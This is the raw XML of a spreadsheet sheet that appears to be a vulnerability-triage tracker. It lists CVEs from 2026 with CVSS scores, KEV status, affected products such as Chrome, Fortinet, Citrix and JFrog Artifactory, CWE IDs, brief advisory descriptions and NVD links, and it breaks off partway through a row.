    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1251" r:id="rId1250"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1252" r:id="rId1251"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1253" r:id="rId1252"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1254" r:id="rId1253"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1255" r:id="rId1254"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1256" r:id="rId1255"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1257" r:id="rId1256"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1258" r:id="rId1257"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1259" r:id="rId1258"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1260" r:id="rId1259"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1261" r:id="rId1260"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1262" r:id="rId1261"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1263" r:id="rId1262"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1264" r:id="rId1263"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1265" r:id="rId1264"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1266" r:id="rId1265"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1267" r:id="rId1266"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1268" r:id="rId1267"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1269" r:id="rId1268"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1270" r:id="rId1269"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1271" r:id="rId1270"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1272" r:id="rId1271"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1273" r:id="rId1272"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1274" r:id="rId1273"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1275" r:id="rId1274"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1276" r:id="rId1275"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1277" r:id="rId1276"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1278" r:id="rId1277"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1279" r:id="rId1278"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1280" r:id="rId1279"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1281" r:id="rId1280"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1282" r:id="rId1281"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1283" r:id="rId1282"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1284" r:id="rId1283"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1285" r:id="rId1284"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1286" r:id="rId1285"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1287" r:id="rId1286"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1288" r:id="rId1287"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1289" r:id="rId1288"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1290" r:id="rId1289"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1291" r:id="rId1290"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1292" r:id="rId1291"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1293" r:id="rId1292"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1294" r:id="rId1293"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1295" r:id="rId1294"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1296" r:id="rId1295"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1297" r:id="rId1296"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1298" r:id="rId1297"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1299" r:id="rId1298"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1300" r:id="rId1299"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1301" r:id="rId1300"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1302" r:id="rId1301"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1303" r:id="rId1302"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1304" r:id="rId1303"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1305" r:id="rId1304"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1306" r:id="rId1305"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1307" r:id="rId1306"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1308" r:id="rId1307"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1309" r:id="rId1308"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1310" r:id="rId1309"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1311" r:id="rId1310"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1312" r:id="rId1311"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1313" r:id="rId1312"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1314" r:id="rId1313"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1315" r:id="rId1314"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1316" r:id="rId1315"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1317" r:id="rId1316"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1318" r:id="rId1317"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1319" r:id="rId1318"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1320" r:id="rId1319"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1321" r:id="rId1320"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1322" r:id="rId1321"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1323" r:id="rId1322"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1324" r:id="rId1323"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1325" r:id="rId1324"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1326" r:id="rId1325"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1327" r:id="rId1326"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1328" r:id="rId1327"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1329" r:id="rId1328"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1330" r:id="rId1329"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1331" r:id="rId1330"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1332" r:id="rId1331"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1333" r:id="rId1332"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1334" r:id="rId1333"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1335" r:id="rId1334"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1336" r:id="rId1335"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1337" r:id="rId1336"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1338" r:id="rId1337"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1339" r:id="rId1338"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1340" r:id="rId1339"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1341" r:id="rId1340"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1342" r:id="rId1341"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1343" r:id="rId1342"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1344" r:id="rId1343"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1345" r:id="rId1344"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1346" r:id="rId1345"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1347" r:id="rId1346"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1348" r:id="rId1347"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1349" r:id="rId1348"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1350" r:id="rId1349"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1351" r:id="rId1350"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1352" r:id="rId1351"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1353" r:id="rId1352"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1354" r:id="rId1353"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1355" r:id="rId1354"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1356" r:id="rId1355"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1357" r:id="rId1356"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1358" r:id="rId1357"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1359" r:id="rId1358"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1360" r:id="rId1359"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1361" r:id="rId1360"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1362" r:id="rId1361"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1363" r:id="rId1362"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1364" r:id="rId1363"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1365" r:id="rId1364"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1366" r:id="rId1365"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1367" r:id="rId1366"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1368" r:id="rId136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Newly scored</t>
        </is>
      </c>
      <c r="C2" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75650</t>
        </is>
      </c>
      <c r="D2" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F2" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G2" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H2" s="5" t="n">
        <v>0.021</v>
      </c>
      <c r="I2" s="5" t="inlineStr"/>
      <c r="J2" s="5" t="inlineStr"/>
      <c r="K2" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t>
        </is>
      </c>
      <c r="L2" s="5" t="inlineStr"/>
      <c r="M2" s="5" t="inlineStr"/>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P2" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q2" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="R2"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S2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75650</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86218</t>
        </is>
      </c>
      <c r="D3" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E3" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F3" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G3" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H3" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I3" s="5" t="inlineStr"/>
      <c r="J3" s="5" t="inlineStr"/>
      <c r="K3" s="5" t="inlineStr">
        <is>
          <t>n-able:n-central</t>
        </is>
      </c>
      <c r="L3" s="5" t="inlineStr"/>
      <c r="M3" s="5" t="inlineStr"/>
      <c r="N3" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O3" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="P3" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q3" s="5" t="inlineStr">
        <is>
          <t>CWE-96</t>
        </is>
      </c>
      <c r="R3" s="5" t="inlineStr">
        <is>
          <t>N-central is vulnerable to a pre-auth remote code execution This issue affects N-central: before 2026.3.1.14.</t>
        </is>
      </c>
      <c r="S3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86218</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58704</t>
        </is>
      </c>
      <c r="D4" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E4" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F4" s="5" t="inlineStr">
        <is>
          <t>CISA-ADP</t>
        </is>
      </c>
      <c r="G4" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H4" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I4" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J4" s="5" t="inlineStr"/>
      <c r="K4" s="5" t="inlineStr">
        <is>
          <t>google:pixel</t>
        </is>
      </c>
      <c r="L4" s="5" t="inlineStr"/>
      <c r="M4" s="5" t="inlineStr"/>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr"/>
      <c r="P4" s="5" t="inlineStr">
        <is>
          <t>2026-09-19</t>
        </is>
      </c>
      <c r="Q4" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-693</t>
        </is>
      </c>
      <c r="R4" s="5" t="inlineStr">
        <is>
          <t>Google Pixel devices contain an improper authorization vulnerability in the cellular modem. A logic error may allow an attacker to bypass permission checks and escalate privileges.</t>
        </is>
      </c>
      <c r="S4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58704</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87491</t>
        </is>
      </c>
      <c r="D5" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E5" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F5" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G5" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H5" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I5" s="5" t="inlineStr"/>
      <c r="J5" s="5" t="inlineStr"/>
      <c r="K5" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L5" s="5" t="inlineStr"/>
      <c r="M5" s="5" t="inlineStr"/>
      <c r="N5" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O5" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P5" s="5" t="inlineStr">
        <is>
          <t>2026-09-23</t>
        </is>
      </c>
      <c r="Q5" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R5" s="5" t="inlineStr">
        <is>
          <t>Out of bounds write in V8 in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87491</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-25249</t>
        </is>
      </c>
      <c r="D6" s="5" t="inlineStr"/>
      <c r="E6" s="5" t="inlineStr"/>
      <c r="F6" s="5" t="inlineStr"/>
      <c r="G6" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H6" s="5" t="n">
        <v>0.024</v>
      </c>
      <c r="I6" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J6" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="K6" s="5" t="inlineStr">
        <is>
          <t>fortinet:multiple products</t>
        </is>
      </c>
      <c r="L6" s="5" t="inlineStr"/>
      <c r="M6" s="5" t="inlineStr"/>
      <c r="N6" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O6" s="5" t="inlineStr"/>
      <c r="P6" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q6" s="5" t="inlineStr"/>
      <c r="R6" s="5" t="inlineStr">
        <is>
          <t>Fortinet FortiOS, FortiSwitchManager, and FortiSASE contain a heap-based buffer overflow vulnerability that allows an attacker to execute unauthorized code or commands via specially crafted packets.</t>
        </is>
      </c>
      <c r="S6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-25249</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C7" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19490</t>
        </is>
      </c>
      <c r="D7" s="5" t="inlineStr"/>
      <c r="E7" s="5" t="inlineStr"/>
      <c r="F7" s="5" t="inlineStr"/>
      <c r="G7" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H7" s="5" t="n">
        <v>0.056</v>
      </c>
      <c r="I7" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J7" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
      <c r="K7" s="5" t="inlineStr">
        <is>
          <t>citrix:netscaler</t>
        </is>
      </c>
      <c r="L7" s="5" t="inlineStr"/>
      <c r="M7" s="5" t="inlineStr"/>
      <c r="N7" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O7" s="5" t="inlineStr"/>
      <c r="P7" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q7" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="R7"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S7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19490</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20079</t>
        </is>
      </c>
      <c r="D8" s="5" t="inlineStr"/>
      <c r="E8" s="5" t="inlineStr"/>
      <c r="F8" s="5" t="inlineStr"/>
      <c r="G8" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H8" s="5" t="n">
        <v>0.758</v>
      </c>
      <c r="I8" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J8" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K8" s="5" t="inlineStr">
        <is>
          <t>cisco:secure firewall management center (fmc) and security cloud control (scc) firewall management</t>
        </is>
      </c>
      <c r="L8" s="5" t="inlineStr"/>
      <c r="M8" s="5" t="inlineStr"/>
      <c r="N8" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O8" s="5" t="inlineStr"/>
      <c r="P8" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q8" s="5" t="inlineStr"/>
      <c r="R8"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S8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20079</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C9" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42016</t>
        </is>
      </c>
      <c r="D9" s="5" t="inlineStr"/>
      <c r="E9" s="5" t="inlineStr"/>
      <c r="F9" s="5" t="inlineStr"/>
      <c r="G9" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H9" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I9" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J9" s="5" t="inlineStr"/>
      <c r="K9" s="5" t="inlineStr">
        <is>
          <t>jfrog:artifactory</t>
        </is>
      </c>
      <c r="L9" s="5" t="inlineStr"/>
      <c r="M9" s="5" t="inlineStr"/>
      <c r="N9" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O9" s="5" t="inlineStr"/>
      <c r="P9" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q9" s="5" t="inlineStr"/>
      <c r="R9" s="5" t="inlineStr">
        <is>
          <t>JFrog Artifactory contains an incorrect authorization vulnerability that leads to a privilege escalation attack due to a validation check of the token signature/issuer and not the token’s scope.</t>
        </is>
      </c>
      <c r="S9" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42016</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42018</t>
        </is>
      </c>
      <c r="D10" s="5" t="inlineStr"/>
      <c r="E10" s="5" t="inlineStr"/>
      <c r="F10" s="5" t="inlineStr"/>
      <c r="G10" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H10" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I10" s="5" t="inlineStr">
        <is>
          <t>none</t>
        </is>
      </c>
      <c r="J10" s="5" t="inlineStr"/>
      <c r="K10" s="5" t="inlineStr">
        <is>
          <t>jfrog:artifactory</t>
        </is>
      </c>
      <c r="L10" s="5" t="inlineStr"/>
      <c r="M10" s="5" t="inlineStr"/>
      <c r="N10" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O10" s="5" t="inlineStr"/>
      <c r="P10" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q10" s="5" t="inlineStr"/>
      <c r="R10" s="5" t="inlineStr">
        <is>
          <t>JFrog Artifactory contains an improper authentication vulnerability that could return an internal anonymous-user token to an unauthenticated caller when anonymous access is disabled, potentially exposing sensitive resources.</t>
        </is>
      </c>
      <c r="S10" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42018</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67277</t>
        </is>
      </c>
      <c r="D11" s="5" t="inlineStr"/>
      <c r="E11" s="5" t="inlineStr"/>
      <c r="F11" s="5" t="inlineStr"/>
      <c r="G11" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H11" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I11" s="5" t="inlineStr">
        <is>
